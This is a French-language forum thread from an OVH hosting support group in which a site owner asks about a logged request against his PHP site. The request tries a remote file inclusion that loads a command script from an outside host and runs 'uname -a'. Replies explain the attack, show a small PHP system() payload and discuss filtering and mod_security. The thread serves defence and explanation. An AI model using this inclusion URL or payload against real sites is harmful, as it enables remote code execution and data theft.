OVH Cloud OVH Cloud

Tentative de quoi ?

46 réponses
Avatar
VarioFlux
Bonjour,

Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.

Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a

J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?

Merci

10 réponses

1 2 3 4 5
Avatar
Thibaut Allender

Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.

Enfin ça reste HS :-)


bcp de boulot et de traitement pour un truc qui peut changer tout le
temps...
et surtout completement inutile si on fait les verifications necessaires
*avant* d'inclure n'importe quoi

--
thibaut allender | freelance | web|system developer|designer
+32 496 26 75 76 | http://capsule.org

Avatar
Patrick
On pourrait faire une liste de ces #{~#[|{##[, non ?


ca servirait a quoi ?


Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.


Ou installation d'un ``firewall'' applicatif pour Apache, comme
mod_security

Patrick.



Avatar
EspaceTrain
Bonjour Stéphane,

Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est
trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse
suivant l'ip de connextion, que sais je encore.


Tout à fait.
C'est toutefois complémentaire des tests d'inclusion d'url.
Cela me permet de bannir entièrement mon site des amusements d'u indélicat.

Enfin ça reste HS :-)


Pas tout à fait :-)
Quel serait l'impact chez un hébergeur d'une intrusion réussie sur un site ?
--
Fred

Avatar
EspaceTrain
Bonjour Thibaut,

et surtout completement inutile si on fait les verifications
necessaires *avant* d'inclure n'importe quoi


L'un n'empêche pas l'autre.
Perso, je bloque ainsi l'accès de tout mon site à l'indélicat qui fait
mumuse avec une manip d'intrusion.
C'est une sécurité supplémentaire dans le cas où je laisserais passer une
faille...
--
Fred

Avatar
trewan
Pour info, Ovh a été hacké cette semaine (dont le site dont je
m'occupe), il a laissé en signature "mirrorteam"

Trewan

VarioFlux wrote:
Cedric Blancher a couché sur son écran :

Elle est passée l'attaque ? C'est quoi le résultat de la requête ?



Je ne pense pas : je récupère le contenu de la variable par $_GET, je
teste par un switch certaines valeurs prédéfinies sinon j'en impose une
par défaut, ça me permet de remplir une valeur numérique et je déclenche
des includes spécifiques par un switch sur la valeur numérique (qui gère
aussi les valeurs et le "par défaut") de pages internes.

Par contre, je sais qu'il est venu grace à mon script de tracking, mais
comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que
chercher ?

Merci



Avatar
Dominique ROUSSEAU

On pourrait faire une liste de ces #{~#[|{##[, non ?


ca servirait a quoi ?



Ca *pourrait* etre pour tenter de faire exécuter un bout de code
"hostile" dans le contexte du site attaqué.
Selon la façon dont le "pg=..." est traité ensuite, par exemple si c'est
un include(), si le site distant envoie un bout de source PHP, il sera
executé dans le contexte du site attaqué, donc accès à des trucs genre
conf bdd, parcours des fichiers du répertoire, etc.


Dom


Avatar
Lionel
Thibaut Allender wrote:
c'est simple


il y a un détail qui m'échappe...

Un include est forcément utilisé dans une balise php:

<?php
include($maVar);
?>

donc en incluant le code du site passé en paramètre, le résultat sera:
<?php
<?
system(uname -a);
?>
?>

ce qui va donner une erreur...
???

Avatar
Stephane Kanschine
Dans , Patrick
tapotait :

Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est
trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse
suivant l'ip de connextion, que sais je encore.


Ou installation d'un ``firewall'' applicatif pour Apache, comme
mod_security


Il n'y avait aucune proposition technique derrière, je m'arrêtais à la
théorie, chacun ses choix techniques derrière. Pour ce faire,
j'employerais apache direct, y'a une solution déjà integrée.

--
Stephane Kanschine
Amadouer l'anti-spam pour me répondre


Avatar
Thibaut Allender

donc en incluant le code du site passé en paramètre, le résultat sera:
<?php
<?
system(uname -a);
?>
?>

ce qui va donner une erreur...
???


non, tu n'as pas compris le principe de l'include

--
thibaut allender | freelance | web|system developer|designer
+32 496 26 75 76 | http://capsule.org

Avatar
pasAlanpasCox
Le Thu, 26 Feb 2004 09:26:16 +0000, VarioFlux a écrit :

cmd=uname%20-a



uname -a est une commande unix pour voir quel est l'OS (linux, sun,
FreeBSD, ou tout autre) deta becane. Il voulait voir ça afin de voir
quelles peuvent être les failles

1 2 3 4 5